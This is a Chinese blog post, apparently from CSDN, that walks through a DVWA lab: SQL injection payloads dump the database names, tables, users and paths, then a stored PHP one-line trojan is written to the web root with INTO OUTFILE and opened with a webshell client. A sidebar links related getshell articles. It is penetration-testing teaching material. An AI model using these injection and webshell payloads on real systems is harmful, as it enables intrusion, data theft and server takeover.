MySQL获取PHP webshell

最新推荐文章于 2023-10-16 15:30:00 发布
最新推荐文章于 2023-10-16 15:30:00 发布
阅读量2.1k 收藏 5
点赞数 4
分类专栏: 漏洞测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43592364/article/details/104027784
版权

在渗透测试中,希望通过MySQL获取webshell需要满足以下几个条件:

1、对web目录有写权限

2、GPC关闭(是否对单引号进行转义)

3、知道服务器的绝对路径

4、secure-file-priv为打开的状态

至少要满足以上4个条件,才能顺利通过MySQL获取webshell

 

接下来,为了能够模拟出渗透这一个过程,使用dvwa靶场来进行模拟(当然相比于真正的时间,中间会省略很多过程)

首先打开dvwa靶场,他是搭建在本地的靶场,数据库和代码均保存在本地服务器中。这里我使用的是phpstudy集成环境,使用navicat作为数据库的视图工具

当然在实战过程中是不知道这些信息的,这里只是提前做一个演示 

为了方便起见,就将安全级别设置为low,方便爆库。

首先判断是否存在注入点,输入1点击查询能查询出结果;输入 ' 发生报错说明这里存在注入点

输入 

' or ' ' = '

对SQL语句进行拼接(这里不做过多解释,SQL注入详见:初识SQL注入初识SQL盲注),爆出Firstname和Surname的所有信息。猜测字段数为2,使用order by,输入

1' order by 2 #

说明存在两个字段,再使用联合查询,输入

1' union select 1,2 #

所以我们知道字段1内容会显示在1的位置,字段2内容会显示在2的位置。那么可以通过SQL注入的方法来注出一些有用的信息

爆库名及版本信息

1' union select database(),version() #

 

 爆当前用户

1' union select 1,user() #

 

爆所有数据库名

1' union select 1,schema_name from information_schema.schemata #

爆其中一个数据库dvwa的表名

1' union select 1,table_name from information_schema.tables where table_schema=database() #

爆users表的字段

1' union select 1,column_name from information_schema.columns where table_name = 'users' #

 获取webshell,首先要知道目录(这里不展示目录了),可以使用语句

1' union select 1,@@datadir# 

为了获取webshell,还需要数据库开启secure_file_priv,这个需要手动配置(当然在实战中需要数据库已经开启secure_file_priv,这里为了效果就手动开)。找到数据库安装目录下的my.ini,添加

 secure_file_priv=

ctrl+s保存,然后重启MySQL(一定要记得重启) 

在数据库命令行中输入

show variables like '%secure%'; 

若如上图所示为空则表示已经开启,如果为NULL说明MySQL没有重启。

还需要满足对表有插入的权限,在实战中这里涉及到提权,将权限提升至root,这里无法演示就直接在数据库插入一句话木马

然后进行导出的操作,输入

SELECT avatar FROM users WHERE user_id='6' into outfile "G:\php\phpstudy\PHPTutorial\WWW\webshell.php";

查看服务器下已经有webshell这个文件

现在使用菜刀连接

成功获取webshell,可以进行任意操作

成功通过MySQL获取webshell。

实战中情况会复杂很多,这里只做简单的演示。总的来说就是先将一句话木马存至数据库中,再将这个字段导出为PHP文件至服务器目录下,通过菜刀连接。至于数据库的信息和权限需要分别通过爆库和提权来实现。

 

 

 

 

 

 

 

 

零一天地
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入理解MySQL安全(二)-数据库权限webshell
zhujiu_fu的博客
02-13 161
本文深入浅出的讲解了数据库权限对数据库安全的作用及获取webshell的方法和思路,最后阐述了如何才能获取一个稳定的shell的方法和思路。
PHP webshell
07-27
PHP webshell
mysql的几种获取shell和提权的方式
k851819815的博客
02-21 3210
mysql outfile导出webshell 条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法: show global variables like '%secure_file_priv%'; 这个参数只能通过修改配置文件后重启mysql修改。 1.select '<?php phpinfo();?>...
Mysql root账号general_log_file方法获取webshell
bylfsj的博客
10-26 707
...
提权学习 -- 使用 mysql 拿到 webshell
LuckyToMeet-Dian叶
06-14 844
注意 如造成一切损失,与本人无关! 工具准备 scanPort 端口扫描工具,用于扫描内网中开放的端口。 dirBuster 网站目录扫描工具,用于扫描网站的目录已经 URL,暴力破解方式,可能会把服务器弄崩(电脑不咋地的情况)。 提权前提 对方需要开启服务器,且需要知道服务器在宿主机上的绝对路径 知道其 mysql 用户名和密码 mysql 有读写权限,可以向服务器开放目录写木马文件。 有上...
mysql—注入点获取WebShell的几种方式
Thunderclap的博客
11-16 4799
利用条件 1.有写文件条件 secure-file-priv(show variables) 要么禁用,要么设置了路径 show variables like '%secure%' 目录权限 对于MySQL来说,有可以对某个目录进行读写的权限 Selinux 是2.6版本的Linux内核中提供的强制访问控制(MAC)系统 2.知道绝对路径 3.PHP的GPC为 off状态,或者在开启gpc的情况下,可以通过十六进制的路径读写文件 4.查看当前数据库用户是否有File权限 select
mysql权限用户getshell_GetShell的姿势总结
weixin_39571179的博客
12-21 1021
原文来自SecIN社区—作者:WiHat0x00 什么是WebShell渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使...
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
wso_webshell_php_
10-01
Webshell
php木马webshell扫描器代码
12-18
php /* +————————————————————————–+ | Codz by indexphp Version:0.01 | | (c) 2009 indexphp | | http://www.indexphp.org | +————————————————————————–+ */ ...
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
webshell最新PHP
07-26
webshell最新PHP NULL&SubnetMask=255.255.255.0&DNSServer1=192.168.10.1&DNSServer2=NULL&DNSServer3=NULL&DomainName=NULL&IPRouters=192.168.10.1
webshell详解
w17791476027的博客
08-03 3481
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成webshell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
常用的WebShell管理工具
美奇软件开发工作室
10-13 2854
1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 官网:http://www.maicaidao.co/ 2、蚁剑(AntSword) AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。 github项目地址:https://
webshell及工具
heyingcheng的博客
05-10 2303
1,eval()函数把字符串按照php代码来计算;2,该字符串必须是合法的php代码,且必须以分号结尾;php中的echo的功能是把参数直接输出到页面上:php?给参数caidao赋值,然后输出到页面上:给caidao的值111输出到页面是111eval函数把字符串按照php代码进行解析,并且该字符串必须是合法的php代码。eval函数前面加上@符号可以不显示报错。php?eval函数的作用也是解析参数,我们在firefox随意传递一个参数试试:可以看到没有加@时我们会看到报错信息。
WebShell简介
Karka_的博客
06-08 890
• JSP类型• ASP类型• PHP类型。
什么是webshell 常见的webshell工具有哪些
最新发布
qq_44005305的博客
10-16 1077
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
High级别的文件上传
qq_43592364的博客
05-19 4260
漏洞:文件上传 打开火狐浏览器进入DVWA靶场,将安全等级设置为High 编写一个文件攻击脚本文件并且任意选择一张图片 PHP的一句话木马 注意:现在Windows10的安全性做的相当高,有可能刚刚保存好编辑完的攻击脚本就会被Windows Defend视为病毒误杀,这里提供一个工具可以关闭Windows Defend,这样就可以确保攻击脚本不被误杀 一键开启关闭Windows Defend...
webshell文件上传php上传
06-28
WebShell是一种可以在Web服务器上执行命令的脚本程序,而PHP上传则是指利用PHP脚本实现文件上传功能。这两者之间并没有直接的联系,但是WebShell可以被用来上传PHP文件,从而实现文件上传功能。需要注意的是,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值